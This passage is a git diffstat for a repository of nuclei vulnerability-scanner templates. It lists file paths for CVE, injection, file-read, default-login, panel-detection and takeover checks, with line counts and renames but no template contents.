nuclei-templates/CVE-2022/CVE-2022-33119.yaml | 35 + nuclei-templates/CVE-2022/CVE-2022-34047.yaml | 34 - nuclei-templates/CVE-2022/CVE-2022-35416.yaml | 39 - nuclei-templates/CVE-2022/CVE-2022-35914.yaml | 46 - nuclei-templates/CVE-2022/CVE-2022-36883.yaml | 27 - nuclei-templates/CVE-2022/cve-2022-0165.yaml | 29 + nuclei-templates/CVE-2022/cve-2022-0201.yaml | 38 + ...{CVE-2022-0218.yaml => cve-2022-0218.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-0288.yaml | 50 - nuclei-templates/CVE-2022/cve-2022-0422.yaml | 50 - nuclei-templates/CVE-2022/cve-2022-0482.yaml | 57 + nuclei-templates/CVE-2022/cve-2022-0540.yaml | 39 + nuclei-templates/CVE-2022/cve-2022-0543.yaml | 39 + nuclei-templates/CVE-2022/cve-2022-0653.yaml | 42 - nuclei-templates/CVE-2022/cve-2022-0776.yaml | 40 - nuclei-templates/CVE-2022/cve-2022-0870.yaml | 54 + ...{CVE-2022-0921.yaml => cve-2022-0921.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-1040.yaml | 48 - nuclei-templates/CVE-2022/cve-2022-1119.yaml | 40 - nuclei-templates/CVE-2022/cve-2022-1221.yaml | 45 + nuclei-templates/CVE-2022/cve-2022-1388.yaml | 27 - nuclei-templates/CVE-2022/cve-2022-1392.yaml | 38 + nuclei-templates/CVE-2022/cve-2022-1609.yaml | 39 - nuclei-templates/CVE-2022/cve-2022-1904.yaml | 42 + nuclei-templates/CVE-2022/cve-2022-1906.yaml | 45 + nuclei-templates/CVE-2022/cve-2022-21500.yaml | 51 - nuclei-templates/CVE-2022/cve-2022-2187.yaml | 43 + nuclei-templates/CVE-2022/cve-2022-22536.yaml | 61 + nuclei-templates/CVE-2022/cve-2022-22972.yaml | 106 + nuclei-templates/CVE-2022/cve-2022-23131.yaml | 39 + nuclei-templates/CVE-2022/cve-2022-23134.yaml | 43 + nuclei-templates/CVE-2022/cve-2022-23779.yaml | 61 - nuclei-templates/CVE-2022/cve-2022-23881.yaml | 37 + ...VE-2022-23944.yaml => cve-2022-23944.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-24112.yaml | 80 + nuclei-templates/CVE-2022/cve-2022-24129.yaml | 37 + nuclei-templates/CVE-2022/cve-2022-24181.yaml | 46 - nuclei-templates/CVE-2022/cve-2022-24260.yaml | 49 - nuclei-templates/CVE-2022/cve-2022-2486.yaml | 41 - nuclei-templates/CVE-2022/cve-2022-2487.yaml | 55 - nuclei-templates/CVE-2022/cve-2022-26134.yaml | 50 + nuclei-templates/CVE-2022/cve-2022-26135.yaml | 32 - nuclei-templates/CVE-2022/cve-2022-26138.yaml | 42 - nuclei-templates/CVE-2022/cve-2022-26148.yaml | 56 + nuclei-templates/CVE-2022/cve-2022-26159.yaml | 40 + nuclei-templates/CVE-2022/cve-2022-26233.yaml | 34 + nuclei-templates/CVE-2022/cve-2022-26960.yaml | 40 + nuclei-templates/CVE-2022/cve-2022-27927.yaml | 44 + nuclei-templates/CVE-2022/cve-2022-28079.yaml | 45 - nuclei-templates/CVE-2022/cve-2022-28080.yaml | 72 + nuclei-templates/CVE-2022/cve-2022-28219.yaml | 58 + nuclei-templates/CVE-2022/cve-2022-29014.yaml | 38 + nuclei-templates/CVE-2022/cve-2022-29298.yaml | 39 + nuclei-templates/CVE-2022/cve-2022-29383.yaml | 46 + nuclei-templates/CVE-2022/cve-2022-29548.yaml | 44 + nuclei-templates/CVE-2022/cve-2022-30776.yaml | 45 - nuclei-templates/CVE-2022/cve-2022-31268.yaml | 48 + nuclei-templates/CVE-2022/cve-2022-31373.yaml | 45 + nuclei-templates/CVE-2022/cve-2022-32015.yaml | 35 + nuclei-templates/CVE-2022/cve-2022-32022.yaml | 51 - nuclei-templates/CVE-2022/cve-2022-32025.yaml | 54 - nuclei-templates/CVE-2022/cve-2022-32026.yaml | 54 + ...VE-2022-32159.yaml => cve-2022-32159.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-32409.yaml | 38 + nuclei-templates/CVE-2022/cve-2022-33119.yaml | 40 - nuclei-templates/CVE-2022/cve-2022-34047.yaml | 45 + nuclei-templates/CVE-2022/cve-2022-35416.yaml | 46 + nuclei-templates/CVE-2022/cve-2022-36883.yaml | 38 + nuclei-templates/CVE-2023/CVE-2023-23752.yaml | 35 - nuclei-templates/CVE-2023/CVE-2023-35047.yaml | 56 + nuclei-templates/CVE-2023/CVE-2023-3836.yaml | 68 - nuclei-templates/CVE-2023/Cve-2023-23752.yaml | 57 + .../CVE-2024-1561.yaml} | 0 ...ve-2024-23897.yaml => CVE-2024-23897.yaml} | 0 nuclei-templates/CVE-2024/CVE-2024-38693.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-38856.yaml | 2 +- nuclei-templates/CVE-2024/CVE-2024-39641.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39642.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39643.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39646.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39647.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39648.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39649.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39651.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39652.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39653.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39655.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39656.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39658.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39659.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39660.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39661.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39663.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39664.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39665.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39668.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-40422.yaml | 66 + nuclei-templates/CVE-2024/CVE-2024-41628.yaml | 61 + nuclei-templates/CVE-2024/CVE-2024-5057.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5226.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5668.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5975.yaml | 58 + nuclei-templates/CVE-2024/CVE-2024-6254.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6552.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6824.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6869.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6987.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7008.yaml | 39 + nuclei-templates/CVE-2024/CVE-2024-7150.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7350.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7486.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7492.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7548.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7560.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7561.yaml | 59 + nuclei-templates/Other/0x71rex-blind-xss.yaml | 30 - nuclei-templates/Other/0xlfi3.yaml | 29 + nuclei-templates/Other/0xlfifuzz1.yaml | 38 + .../2021-20837.yaml} | 0 .../Other/3cx-management-console-1.yaml | 4 + .../Other/3g-wireless-gateway-6.yaml | 5 +- nuclei-templates/Other/44 - T9.yaml | 36 + nuclei-templates/Other/74cms-sqli-10.yaml | 27 + nuclei-templates/Other/74cms-sqli.yaml | 15 - .../{aic-leakage.yaml => AIC-leakage.yaml} | 0 ...kpass.yaml => APACHE-Ambari-weakPass.yaml} | 0 nuclei-templates/Other/API-Linkfinder.yaml | 19 + nuclei-templates/Other/ASUSTOR-ADM-sqli.yaml | 25 - nuclei-templates/Other/ATHD-DVR-fileRead.yaml | 20 + ...ebaccess.yaml => Advantech-WebAccess.yaml} | 0 .../Other/Alibaba-Anyproxy-fileRead.yaml | 23 - ...pereo-cas-rce.yaml => Apereo-Cas-rce.yaml} | 0 ...builder-sqli.yaml => B2BBuilder-sqli.yaml} | 0 nuclei-templates/Other/BOA-Web-fileRead.yaml | 23 + ...tric-detect.yaml => Biometric-detect.yaml} | 0 nuclei-templates/Other/Bitrix_check_env.yaml | 24 - nuclei-templates/Other/BlindSQL.yaml | 35 + .../Other/CL-TE-http-smuggling.yaml | 35 + nuclei-templates/Other/CNVD-2019-17294.yaml | 32 + nuclei-templates/Other/CNVD-2020-56167.yaml | 25 - nuclei-templates/Other/CNVD-2021-14536.yaml | 8 +- nuclei-templates/Other/CNVD-2021-17369.yaml | 33 - ...1-28277-1107.yaml => CNVD-2021-28277.yaml} | 0 nuclei-templates/Other/CNVD-2021-49104.yaml | 6 +- nuclei-templates/Other/CRMEB-sqli.yaml | 18 + .../CVE_2023_49442.yaml} | 0 nuclei-templates/Other/Cache_to_xss.yaml | 72 + ...en-fileread.yaml => DIAOWEN-fileRead.yaml} | 0 ..._Sqli.yaml => Dahua_Video_FileUpload.yaml} | 0 ...-database.yaml => E-message-database.yaml} | 0 .../Other/GCP-service-account.yaml | 4 +- .../Other/GLPI-9.3.3-SQL-Injection.yaml | 25 - ...-rpc-rce.yaml => Hadoop-Yarn-RPC-RCE.yaml} | 0 ...Hikvision_iVMS-8700_Fileupload_Files.yaml} | 0 ...n.yaml => Hikvision_iVMS-8700_upload.yaml} | 0 ...wms-fileread.yaml => JEEWMS-fileRead.yaml} | 0 .../Other/Karel-ip-phone-lfi.yaml | 10 +- .../Landray OA treexml.tmpl Script RCE.yaml | 46 + .../Other/MinIO-default-login.yaml | 29 - .../{mobileiron(1).yaml => MobileIron.yaml} | 0 ...ead.yaml => NETSurveillance-fileRead.yaml} | 0 .../Other/Nsfocus_NF_Firewall_FileUpload.yaml | 28 + nuclei-templates/Other/Nsfocus_sas_Exec.yaml | 49 - .../Other/Panabit-sy_addmount-rce.yaml | 22 + .../Other/{0xlfi.yaml => Path-Traversal.yaml} | 0 ...Default-Login.yaml => RedMine-Detect.yaml} | 0 ...yaml => Ruijie_NBR_Router_fileupload.yaml} | 0 .../Other/SQLInjection_ERROR.yaml | 51 - .../Other/{sitecore.yaml => SiteCore.yaml} | 0 .../Other/Springboot-Loggers.yaml | 36 + .../Other/Symantec-Messaging-Gateway.yaml | 19 + nuclei-templates/Other/WP-Vault-LFI.yaml | 33 + .../Other/WooYun-2015-148227.yaml | 25 + .../Other/{X-Host .yaml => X-Host.yaml} | 0 .../{X-Remote-IP.yaml => X-Remote-IP .yaml} | 0 ...b-server-12.yaml => abyss-web-server.yaml} | 0 ...yaml => accent-microcomputers-lfi-14.yaml} | 0 nuclei-templates/Other/access-log-21.yaml | 3 + .../Other/acemanager-login-25.yaml | 40 - nuclei-templates/Other/acemanager-login.yaml | 37 + .../Other/{acme-xss.yaml => acme-xss-28.yaml} | 0 .../Other/acontent-detect-32.yaml | 26 - .../Other/acontent-detect-33.yaml | 26 + ...-takeover-35.yaml => acquia-takeover.yaml} | 0 ...ard-38.yaml => acrolinx-dashboard-37.yaml} | 0 ...ure-43.yaml => active-admin-exposure.yaml} | 0 ...46.yaml => activemq-default-login-48.yaml} | 0 nuclei-templates/Other/activemq-panel-53.yaml | 26 + nuclei-templates/Other/activemq-panel.yaml | 28 - nuclei-templates/Other/acunetix-panel-54.yaml | 23 + nuclei-templates/Other/acunetix-panel-59.yaml | 30 - nuclei-templates/Other/ad-widget-lfi-126.yaml | 15 +- .../Other/adb-backup-enabled-60.yaml | 23 - .../Other/adb-backup-enabled-61.yaml | 16 + ...4.yaml => addeventlistener-detect-65.yaml} | 0 .../Other/adiscon-loganalyzer-67.yaml | 29 + .../Other/adiscon-loganalyzer-70.yaml | 39 - nuclei-templates/Other/adminer-panel-74.yaml | 50 - nuclei-templates/Other/adminer-panel-75.yaml | 51 + ...nset-panel-80.yaml => adminset-panel.yaml} | 0 .../Other/adobe-component-login-89.yaml | 31 + .../Other/adobe-component-login-91.yaml | 20 - .../Other/adobe-component-login-92.yaml | 22 + .../Other/adobe-component-login.yaml | 32 - .../Other/adobe-connect-central-login-96.yaml | 30 + .../Other/adobe-connect-central-login-97.yaml | 23 - ...on.yaml => adobe-connect-version-104.yaml} | 0 .../adobe-experience-manager-login-109.yaml | 30 - .../Other/adobe-experience-manager-login.yaml | 23 + ...r-112.yaml => adobe-media-server-110.yaml} | 0 .../advanced-access-manager-lfi-116.yaml | 25 - .../advanced-access-manager-lfi-118.yaml | 29 + .../Other/aem-cached-pages-130.yaml | 24 - nuclei-templates/Other/aem-cached-pages.yaml | 25 + ...rx-bypass.yaml => aem-crx-bypass-133.yaml} | 0 .../Other/aem-default-get-servlet-135.yaml | 160 +- .../Other/aem-default-login-140.yaml | 59 + .../Other/aem-default-login-142.yaml | 65 - ...ection-146.yaml => aem-detection-145.yaml} | 0 ...vlet-150.yaml => aem-gql-servlet-149.yaml} | 0 nuclei-templates/Other/aem-groovyconsole.yaml | 28 - .../Other/aem-hash-querybuilder-159.yaml | 30 + .../Other/aem-hash-querybuilder-161.yaml | 28 - .../Other/aem-jcr-querybuilder-166.yaml | 7 +- .../Other/aem-login-status-170.yaml | 29 - .../Other/aem-login-status-171.yaml | 30 + ...ml => aem-merge-metadata-servlet-174.yaml} | 0 nuclei-templates/Other/aem-misconfig.yaml | 31 + ...=> aem-querybuilder-feed-servlet-175.yaml} | 0 ...m-querybuilder-internal-path-read-179.yaml | 24 - ...m-querybuilder-internal-path-read-180.yaml | 30 + .../aem-querybuilder-json-servlet-182.yaml | 41 - .../aem-querybuilder-json-servlet-185.yaml | 30 + ...s-188.yaml => aem-setpreferences-xss.yaml} | 0 .../Other/aem-userinfo-servlet-190.yaml | 32 + .../Other/aem-userinfo-servlet.yaml | 25 - .../aem-wcm-suggestions-servlet-194.yaml | 27 + .../aem-wcm-suggestions-servlet-196.yaml | 26 - .../Other/aem-xss-childlist-selector-198.yaml | 7 + nuclei-templates/Other/aem_misconfig.yaml | 33 - ...01.yaml => aerohive-netconfig-ui-199.yaml} | 0 .../Other/aftership-takeover-204.yaml | 15 - .../Other/aftership-takeover-205.yaml | 19 + .../Other/agilecrm-takeover-211.yaml | 5 +- nuclei-templates/Other/aha-takeover-217.yaml | 15 + nuclei-templates/Other/aha-takeover.yaml | 16 - ...aml => aims-password-mgmt-client-221.yaml} | 0 .../Other/aims-password-portal-222.yaml | 22 - .../Other/aims-password-portal.yaml | 32 + .../Other/airee-takeover-226.yaml | 16 - .../Other/airee-takeover-228.yaml | 19 + .../airflow-configuration-exposure-230.yaml | 18 + .../Other/airflow-configuration-exposure.yaml | 16 - ...flow-debug-231.yaml => airflow-debug.yaml} | 0 .../Other/airflow-detect-239.yaml | 27 - nuclei-templates/Other/airflow-detect.yaml | 24 + ...horized.yaml => airflow-unauthorized.yaml} | 0 .../Other/akamai-cloudtest-252.yaml | 31 - .../Other/akamai-cloudtest-253.yaml | 24 + .../Other/alfacgiapi-wordpress-255.yaml | 2 + .../Other/alibaba-anyproxy-fileread.yaml | 26 + .../Other/alibaba-canal-info-leak-266.yaml | 35 - .../Other/alibaba-canal-info-leak.yaml | 35 + ...68.yaml => alibaba-mongoshake-unauth.yaml} | 0 .../Other/alienvault-usm-274.yaml | 10 +- .../Other/alphaweb-default-login-277.yaml | 43 + .../Other/alphaweb-default-login.yaml | 30 - .../Other/amazon-docker-config-280.yaml | 18 + .../Other/amazon-docker-config.yaml | 16 - .../Other/amazon-mws-auth-token-11845.yaml | 24 + .../Other/amazon-mws-auth-token-value.yaml | 13 - .../Other/ambari-default-credentials-285.yaml | 20 - .../Other/ambari-default-credentials.yaml | 18 + .../Other/ambari-default-login-289.yaml | 4 +- .../Other/ambari-exposure-293.yaml | 16 + .../Other/ambari-exposure-294.yaml | 24 - nuclei-templates/Other/amcrest-login-297.yaml | 9 +- ...n-301.yaml => ametys-admin-login-300.yaml} | 0 .../Other/amministrazione-aperta-lfi-303.yaml | 21 + .../Other/amministrazione-aperta-lfi.yaml | 28 - .../Other/ampps-admin-panel-304.yaml | 40 - .../Other/ampps-admin-panel-305.yaml | 43 + nuclei-templates/Other/ampps-panel.yaml | 5 + .../Other/{AMSS-sqli.yaml => amss-sqli.yaml} | 0 .../android-debug-database-exposed-315.yaml | 23 - .../Other/android-debug-database-exposed.yaml | 24 + .../Other/anima-takeover-318.yaml | 18 - .../Other/anima-takeover-319.yaml | 19 + ...leDownload.yaml => anni-filedownload.yaml} | 0 .../Other/announcekit-takeover-322.yaml | 28 + .../Other/announcekit-takeover-324.yaml | 25 - .../Other/ansible-config-disclosure-326.yaml | 18 - .../Other/ansible-config-disclosure.yaml | 16 + ...-327.yaml => ansible-semaphore-panel.yaml} | 0 ...e-329.yaml => ansible-tower-exposure.yaml} | 0 .../Other/antsword-backdoor-334.yaml | 24 - .../Other/antsword-backdoor-335.yaml | 31 + ...eakPass.yaml => aolynkbr304-weakpass.yaml} | 0 .../Other/apache-apisix-panel-338.yaml | 10 +- .../Other/apache-axis-detect-339.yaml | 32 - .../Other/apache-axis-detect.yaml | 35 + .../Other/apache-cocoon-detect-342.yaml | 26 + .../Other/apache-cocoon-detect.yaml | 27 - nuclei-templates/Other/apache-detect-346.yaml | 30 - nuclei-templates/Other/apache-detect-347.yaml | 31 + .../Other/apache-filename-enum-354.yaml | 27 - .../Other/apache-filename-enum.yaml | 30 + .../Other/apache-flink-unauth-rce-356.yaml | 41 + .../Other/apache-flink-unauth-rce-359.yaml | 43 - .../Other/apache-ofbiz-log4j-rce-366.yaml | 44 + .../Other/apache-ofbiz-log4j-rce.yaml | 28 - .../Other/apache-solr-file-read.yaml | 44 + .../Other/apache-solr-log4j-rce-372.yaml | 43 - .../Other/apache-solr-log4j-rce.yaml | 31 + .../Other/apache-tomcat-CVE-2022-34305.yaml | 19 - .../Other/apache-tomcat-cve-2022-34305.yaml | 21 + .../Other/apache-tomcat-snoop-375.yaml | 7 +- nuclei-templates/Other/apc-ups-login-382.yaml | 24 + nuclei-templates/Other/apc-ups-login.yaml | 25 - .../{apc-info-378.yaml => apc_info.yaml} | 0 .../Other/api-adafruit-io-387.yaml | 22 + nuclei-templates/Other/api-adafruit-io.yaml | 24 - .../Other/api-apigee-edge-391.yaml | 26 + nuclei-templates/Other/api-apigee-edge.yaml | 29 - nuclei-templates/Other/api-appveyor-392.yaml | 23 - nuclei-templates/Other/api-appveyor.yaml | 25 + nuclei-templates/Other/api-bible-394.yaml | 24 - nuclei-templates/Other/api-bible.yaml | 28 + nuclei-templates/Other/api-bitrise-397.yaml | 24 - nuclei-templates/Other/api-bitrise.yaml | 28 + .../Other/api-blockchain-398.yaml | 33 + nuclei-templates/Other/api-blockchain.yaml | 27 - nuclei-templates/Other/api-buildkite.yaml | 25 - nuclei-templates/Other/api-buttercms-403.yaml | 16 - nuclei-templates/Other/api-calendly.yaml | 25 - nuclei-templates/Other/api-clearbit-407.yaml | 24 + nuclei-templates/Other/api-clearbit.yaml | 28 - nuclei-templates/Other/api-coinapi-408.yaml | 24 + nuclei-templates/Other/api-coinapi.yaml | 28 - .../Other/api-cooperhewitt-409.yaml | 12 +- nuclei-templates/Other/api-dbt-413.yaml | 24 + nuclei-templates/Other/api-dbt.yaml | 26 - nuclei-templates/Other/api-debounce-414.yaml | 22 + nuclei-templates/Other/api-debounce.yaml | 25 - .../Other/api-deviantart-415.yaml | 18 + nuclei-templates/Other/api-deviantart.yaml | 21 - nuclei-templates/Other/api-dribbble-416.yaml | 21 - nuclei-templates/Other/api-dribbble-417.yaml | 21 + nuclei-templates/Other/api-dropbox-418.yaml | 24 - nuclei-templates/Other/api-dropbox.yaml | 24 + nuclei-templates/Other/api-europeana-419.yaml | 12 +- nuclei-templates/Other/api-facebook-422.yaml | 22 + nuclei-templates/Other/api-facebook.yaml | 25 - nuclei-templates/Other/api-fastly-423.yaml | 25 + nuclei-templates/Other/api-fastly-424.yaml | 21 - .../Other/api-fontawesome-426.yaml | 26 + nuclei-templates/Other/api-fontawesome.yaml | 29 - nuclei-templates/Other/api-github-429.yaml | 18 + nuclei-templates/Other/api-github.yaml | 24 - nuclei-templates/Other/api-gitlab.yaml | 12 +- .../Other/api-google-drive-432.yaml | 20 + nuclei-templates/Other/api-google-drive.yaml | 23 - nuclei-templates/Other/api-heroku-435.yaml | 25 + nuclei-templates/Other/api-heroku.yaml | 25 - nuclei-templates/Other/api-hubspot-437.yaml | 18 + .../Other/api-iconfinder-438.yaml | 28 - .../Other/api-iconfinder-439.yaml | 28 + nuclei-templates/Other/api-instatus-442.yaml | 25 - nuclei-templates/Other/api-instatus.yaml | 29 + nuclei-templates/Other/api-iterable-445.yaml | 20 + nuclei-templates/Other/api-jumpcloud-446.yaml | 13 +- .../{api-leanix-450.yaml => api-leanix.yaml} | 0 nuclei-templates/Other/api-linkedin-451.yaml | 25 - nuclei-templates/Other/api-linkedin.yaml | 28 + nuclei-templates/Other/api-linkfinder.yaml | 22 - ...pi-malshare-456.yaml => api-malshare.yaml} | 0 .../Other/api-malwarebazaar-458.yaml | 2 +- nuclei-templates/Other/api-mapbox-465.yaml | 16 + nuclei-templates/Other/api-mojoauth-466.yaml | 24 - nuclei-templates/Other/api-mojoauth.yaml | 28 + nuclei-templates/Other/api-npm-471.yaml | 23 + nuclei-templates/Other/api-onelogin-472.yaml | 25 + nuclei-templates/Other/api-onelogin.yaml | 27 - .../Other/api-openweather-473.yaml | 23 - nuclei-templates/Other/api-pagerduty-475.yaml | 19 - nuclei-templates/Other/api-pastebin-477.yaml | 24 + nuclei-templates/Other/api-pastebin.yaml | 28 - nuclei-templates/Other/api-paypal-478.yaml | 25 - nuclei-templates/Other/api-paypal.yaml | 28 + nuclei-templates/Other/api-petfinder-480.yaml | 27 - nuclei-templates/Other/api-petfinder.yaml | 31 + .../Other/api-pivotaltracker.yaml | 5 - nuclei-templates/Other/api-postmark.yaml | 18 - nuclei-templates/Other/api-quip-484.yaml | 23 + nuclei-templates/Other/api-quip.yaml | 27 - ...ksmuseum.yaml => api-rijksmuseum-485.yaml} | 0 nuclei-templates/Other/api-sendgrid-489.yaml | 8 +- nuclei-templates/Other/api-slack.yaml | 19 + nuclei-templates/Other/api-spotify-495.yaml | 20 +- nuclei-templates/Other/api-square-496.yaml | 25 - nuclei-templates/Other/api-sslmate-497.yaml | 25 - nuclei-templates/Other/api-sslmate.yaml | 28 + nuclei-templates/Other/api-stytch-500.yaml | 27 + nuclei-templates/Other/api-stytch.yaml | 31 - ...-thecatapi-503.yaml => api-thecatapi.yaml} | 0 nuclei-templates/Other/api-travisci-506.yaml | 8 +- nuclei-templates/Other/api-twitter.yaml | 19 - ...-urlscan-508.yaml => api-urlscan-509.yaml} | 0 ...irustotal.yaml => api-virustotal-512.yaml} | 0 .../Other/api-visualstudio-513.yaml | 20 - nuclei-templates/Other/api-weglot-516.yaml | 24 - nuclei-templates/Other/api-weglot.yaml | 24 + nuclei-templates/Other/api-wordcloud.yaml | 2 +- .../Other/apisix-default-login.yaml | 8 +- .../Other/apollo-adminservice.yaml | 24 + .../Other/apollo-default-login-520.yaml | 57 - .../Other/apollo-default-login-521.yaml | 51 + .../Other/apple-app-site-association-524.yaml | 6 +- .../Other/appspec-yml-disclosure-527.yaml | 25 - .../Other/appspec-yml-disclosure.yaml | 28 + ...s-panel-530.yaml => arcgis-panel-531.yaml} | 0 ...rest-api.yaml => arcgis-rest-api-533.yaml} | 0 ...d-login-536.yaml => argocd-login-534.yaml} | 0 .../Other/arl-default-login-539.yaml | 44 - nuclei-templates/Other/arl-default-login.yaml | 31 + .../Other/artica-web-proxy-detect-543.yaml | 22 + .../Other/artica-web-proxy-detect.yaml | 18 - ...yaml => artifactory-anonymous-deploy.yaml} | 0 .../Other/asanhamayesh-lfi-552.yaml | 21 + .../Other/asanhamayesh-lfi-553.yaml | 28 - .../Other/aspnuke-openredirect-554.yaml | 4 +- .../Other/aspose-file-download-561.yaml | 28 + .../Other/aspose-file-download.yaml | 23 - ...yaml => aspose-pdf-file-download-566.yaml} | 0 .../Other/aspose-words-file-download-571.yaml | 29 + .../Other/aspose-words-file-download.yaml | 25 - .../Other/aspx-debug-mode-578.yaml | 3 +- nuclei-templates/Other/asustor-adm-sqli.yaml | 29 + nuclei-templates/Other/athd-dvr-fileread.yaml | 22 - .../Other/atlassian-crowd-panel-581.yaml | 19 + .../Other/atlassian-crowd-panel-585.yaml | 25 - .../Other/attitude-theme-open-redirect.yaml | 3 +- ...e-login-591.yaml => atvise-login-590.yaml} | 0 .../Other/autobahn-python-detect-595.yaml | 30 - .../Other/autobahn-python-detect.yaml | 29 + ...ct-596.yaml => automation-direct-597.yaml} | 0 .../Other/avantfax-detect-598.yaml | 31 + .../Other/avantfax-detect-600.yaml | 24 - .../Other/avantfax-panel-601.yaml | 41 - .../Other/avantfax-panel-603.yaml | 32 + ...l => avatier-password-management-605.yaml} | 0 nuclei-templates/Other/aviatrix-panel.yaml | 9 +- ...ml => avtech-avn801-camera-panel-612.yaml} | 0 .../Other/aws-access-key-value-621.yaml | 18 + .../Other/aws-access-key-value-622.yaml | 24 - .../Other/aws-bucket-takeover-630.yaml | 20 - .../Other/aws-bucket-takeover-631.yaml | 25 + .../Other/aws-cloudfront-service-635.yaml | 2 +- ...=> aws-ecs-container-agent-tasks-640.yaml} | 0 .../aws-elastic-beanstalk-detect-644.yaml | 31 + .../Other/aws-elastic-beanstalk-detect.yaml | 30 - ...g-648.yaml => aws-object-listing-645.yaml} | 0 nuclei-templates/Other/aws-redirect-651.yaml | 24 + nuclei-templates/Other/aws-redirect-654.yaml | 24 - ...onfig-656.yaml => awstats-config-655.yaml} | 0 ...ts-script.yaml => awstats-script-658.yaml} | 0 .../Other/axigen-webadmin-659.yaml | 13 +- .../Other/axigen-webmail-662.yaml | 24 - .../Other/axigen-webmail-664.yaml | 40 + .../axiom-digitalocean-key-exposure-666.yaml | 28 + .../axiom-digitalocean-key-exposure.yaml | 35 - .../Other/azkaban-default-login-671.yaml | 4 +- ...lient-679.yaml => azkaban-web-client.yaml} | 0 .../Other/azure-takeover-detection-681.yaml | 32 +- nuclei-templates/Other/bak.yaml | 22 - .../Other/{bash.yaml => bash-scanner.yaml} | 0 ...ion.yaml => basic-auth-detection-687.yaml} | 0 .../Other/basic-xss-prober-696.yaml | 36 + nuclei-templates/Other/basic-xss-prober.yaml | 31 - nuclei-templates/Other/basic_sqli.yaml | 47 + nuclei-templates/Other/bazarr-login.yaml | 3 +- nuclei-templates/Other/bems-api-lfi-711.yaml | 24 - nuclei-templates/Other/bems-api-lfi.yaml | 20 + .../Other/beward-ipcamera-disclosure.yaml | 9 +- .../Other/beyondtrust-login-server-719.yaml | 31 - .../Other/beyondtrust-login-server.yaml | 31 + nuclei-templates/Other/beyondtrust-panel.yaml | 4 +- .../Other/bigbluebutton-login-725.yaml | 28 - .../Other/bigbluebutton-login-726.yaml | 34 + ...eover.yaml => bigcartel-takeover-728.yaml} | 0 .../bigip-config-utility-detect-733.yaml | 33 - .../Other/bigip-config-utility-detect.yaml | 34 + ...etection-735.yaml => bigip-detection.yaml} | 0 .../Other/{api-bitly-396.yaml => bitly.yaml} | 0 .../Other/bitrix-open-redirect-743.yaml | 40 + .../Other/bitrix-open-redirect-744.yaml | 40 - nuclei-templates/Other/bitrix-panel-748.yaml | 34 - nuclei-templates/Other/bitrix-panel-750.yaml | 27 + nuclei-templates/Other/bitrix_bak_check.yaml | 22 + nuclei-templates/Other/blind-xss.yaml | 61 + ...ogin-751.yaml => blue-iris-login-754.yaml} | 0 .../Other/blue-ocean-excellence-lfi-755.yaml | 25 - .../Other/blue-ocean-excellence-lfi-758.yaml | 27 + nuclei-templates/Other/boa-web-fileread.yaml | 25 - .../Other/bolt-cms-panel-763.yaml | 38 + nuclei-templates/Other/bolt-cms-panel.yaml | 37 - nuclei-templates/Other/bower-json-769.yaml | 31 - nuclei-templates/Other/bower-json-770.yaml | 31 + ...n.yaml => braintree-access-token-773.yaml} | 0 nuclei-templates/Other/branch-key-775.yaml | 3 +- .../Other/brandfolder-lfi-776.yaml | 25 - nuclei-templates/Other/brandfolder-lfi.yaml | 31 + .../Other/brandfolder-open-redirect-780.yaml | 23 + .../Other/brandfolder-open-redirect.yaml | 20 - ...t-790.yaml => brother-printer-detect.yaml} | 0 .../Other/browserless-debugger-794.yaml | 26 - .../Other/browserless-debugger-795.yaml | 25 + nuclei-templates/Other/buddy-panel-797.yaml | 27 + nuclei-templates/Other/buddy-panel.yaml | 26 - ...yaml => buffalo-config-injection-801.yaml} | 0 nuclei-templates/Other/buildkite.yaml | 25 + .../Other/bullwark-momentum-lfi-808.yaml | 29 - .../Other/bullwark-momentum-lfi.yaml | 29 + .../Other/burp-api-detect-812.yaml | 28 - nuclei-templates/Other/burp-api-detect.yaml | 26 + ...sinessintelligence-default-login-817.yaml} | 0 nuclei-templates/Other/buttercms.yaml | 23 + .../Other/cab-fare-calculator-lfi-819.yaml | 28 + .../Other/cab-fare-calculator-lfi.yaml | 21 - ...poisoning-821.yaml => cache_piossing.yaml} | 0 ...acti-detect.yaml => cacti-detect-826.yaml} | 0 ...{cacti-panel.yaml => cacti-panel-828.yaml} | 0 .../Other/caddy-open-redirect-837.yaml | 20 - .../Other/caddy-open-redirect.yaml | 17 + nuclei-templates/Other/calendly.yaml | 25 + ...break-cms.yaml => call-break-cms-840.yaml} | 0 .../Other/campaignmonitor-843.yaml 